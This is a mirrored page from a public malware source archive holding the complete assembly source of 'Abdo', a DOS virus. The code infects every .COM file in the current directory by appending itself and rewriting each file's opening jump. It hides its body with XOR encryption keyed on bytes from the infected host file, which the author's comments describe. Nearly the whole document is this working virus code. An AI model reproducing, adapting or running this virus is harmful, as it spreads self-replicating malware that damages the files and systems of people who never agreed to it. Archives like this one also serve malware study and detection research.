mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
181 lines
5.1 KiB
NASM
181 lines
5.1 KiB
NASM
; NAME: Abdo.com
|
|
; AUTHOR: Sea4
|
|
; SIZE: 310 bytes
|
|
; ENCRYPTION: Yep
|
|
; STEALTH: Nope
|
|
; ROI: All files in current DIR
|
|
; DT: Nope
|
|
|
|
; Here is an interesting concept in encryption. Brought to my attention by
|
|
; Aperson. The virus will use the host programs own bytes to XOR against. Its
|
|
; very interesting because there is no way to tell what the host will have
|
|
; as its values, so the encryption could almost be considered random. Upon
|
|
; infection, the father virus will read from the victim file enough bytes to
|
|
; cover the encrypted area. It will then, XOR each virus byte against each
|
|
; host byte and keep the results in the buffer. It will then write those new
|
|
; bytes to the victim. Upon startup of the victim it will call the Decryption
|
|
; with a pointer (BX) to the bytes to use as Decryptors. Of course this has
|
|
; a flaw if the host program decides to change its own bytes, though highly
|
|
; uncommon among normal progges. Enjoy!
|
|
|
|
Start:
|
|
jmp V_start ; Jump to start of virus
|
|
|
|
V_start: ; delta offset stuff
|
|
call Delta
|
|
Delta:
|
|
pop bp
|
|
sub bp,offset delta
|
|
|
|
SkipDec: ; Call decryption
|
|
jmp Ende
|
|
; mov cx,Crypto-Hidden
|
|
lea si,[bp+Hidden]
|
|
mov di,si
|
|
mov bx,103h
|
|
Call Crypto
|
|
|
|
Hidden:
|
|
|
|
mov di,100h ; Restore first 3 bytes
|
|
lea si,[bp+saved]
|
|
mov cx,3
|
|
rep movsb
|
|
|
|
mov ah,4Eh ; Find first/next com files
|
|
FindNext:
|
|
xor cx,cx
|
|
lea dx,[bp+FileMask]
|
|
int 21h
|
|
|
|
jnc Open ; Found one, open it
|
|
jmp Exit ; Didn't find any, return to progge
|
|
|
|
Close:
|
|
jmp ShutFile
|
|
|
|
Open:
|
|
mov ax,3D02h ; Open file
|
|
lea dx,9Eh
|
|
int 21h
|
|
|
|
xchg bx,ax ; File handle into BX
|
|
|
|
mov ah,3Fh ; Read first bytes into buffer
|
|
lea dx,[bp+saved]
|
|
mov cx,3
|
|
int 21h
|
|
|
|
xor ax,ax
|
|
cmp ax,[80h+1Ch]
|
|
jnz Close
|
|
|
|
mov ax,[80h+1Ah]
|
|
|
|
cmp ax,0F000h ; Infection criteria
|
|
jnc Close ; No files > 61440d bytes
|
|
cmp ax,400h ; None < 1024d bytes
|
|
jc Close
|
|
|
|
sub ax,3 ; Makes account for the JMP
|
|
sub ax,Ende-V_start ; Subtracts the length of virus
|
|
|
|
cmp ax,[bp+saved+1] ; If the file jumps to AX then it must be
|
|
; infected with this virus, or its very lucky
|
|
je Close ; Close it up if its already infected
|
|
|
|
mov ax,[80h+1Ah] ; Set new JMP destination
|
|
sub ax,3 ; Subtracts the JMP length
|
|
mov [bp+jumpto],ax ; Puts the jumpto location in its buffer
|
|
|
|
mov ax,4200h ; Return file pointer to beginning of file
|
|
xor dx,dx
|
|
xor cx,cx
|
|
int 21h
|
|
|
|
mov ah,40h ; Writes the new JMP
|
|
mov cx,3
|
|
lea dx,[bp+jumping]
|
|
int 21h
|
|
|
|
XorValues EQU Crypto-Hidden+Buffer
|
|
|
|
mov ah,3Fh ; Read from File to get XORvalues
|
|
lea dx,[bp+xorvalues] ; The file pointer is already at 00:03h
|
|
; now we just need to put the bytes in a buffer
|
|
mov cx,Crypto-Hidden ; Length of Bytes to get ( Same length as hidden
|
|
; area, because thats all we need. )
|
|
int 21h ; Tells DOS to fetch some bytes
|
|
|
|
mov ax,4202h ; Move File pointer to end of progge
|
|
xor cx,cx
|
|
xor dx,dx
|
|
int 21h
|
|
|
|
mov ah,40h ; Write Call decryption routines
|
|
lea dx,[bp+v_start]
|
|
mov cx,Hidden-V_start
|
|
int 21h
|
|
|
|
lea di,[bp+buffer] ; Call encryption of Hidden area
|
|
lea si,[bp+hidden]
|
|
mov cx,Crypto-Hidden
|
|
push cx ; Saves CX for the write
|
|
push bx ; Saves BX because it is the file handle
|
|
lea bx,[bp+xorvalues] ; Place where victim file's bytes have been put
|
|
call Crypto ; Calls the encryption routine
|
|
pop bx ; Retrieves the file handle for the Write
|
|
|
|
mov ah,40h ; Write encrypted area to file
|
|
pop cx
|
|
lea dx,[bp+buffer]
|
|
int 21h
|
|
|
|
lea dx,[bp+crypto] ; Write encryption routine to victim
|
|
mov cx,Ende-Crypto
|
|
mov ah,40h
|
|
int 21h
|
|
|
|
ShutFile: ; Close victim and search for next
|
|
mov ah,3Eh
|
|
int 21h
|
|
mov ax,4F00h
|
|
jmp FindNext
|
|
|
|
Exit:
|
|
push 100h
|
|
ret
|
|
|
|
FileMask db '*.com',0
|
|
VirusName db '[Abdo]',0
|
|
Author db 'Sea4, CodeBreakers',0
|
|
message db 'Concept by: Aperson of the CodeBreakers!'
|
|
|
|
Saved db 0CDh,020h,090h
|
|
Jumping db 0E9h
|
|
jumpto db 0h,0h
|
|
|
|
Crypto:
|
|
EncLoop:
|
|
lodsb ; Takes the byte from [SI]
|
|
mov dl,[bx] ; Gets the next byte of host file
|
|
xor al,dl ; XORs the 2 bytes, and saves them in AL
|
|
inc bx ; Moves to next byte
|
|
stosb ; Places the byte back in [DI]
|
|
loop EncLoop ; Does 'em all
|
|
ret ; Return to calling routine
|
|
|
|
Buffer:
|
|
|
|
Ende:
|
|
lea di,SkipDec
|
|
lea si,NewBytes
|
|
|
|
mov cx,3
|
|
rep movsb
|
|
jmp Hidden
|
|
|
|
NewBytes:
|
|
mov cx,Crypto-Hidden
|
|
Finish:
|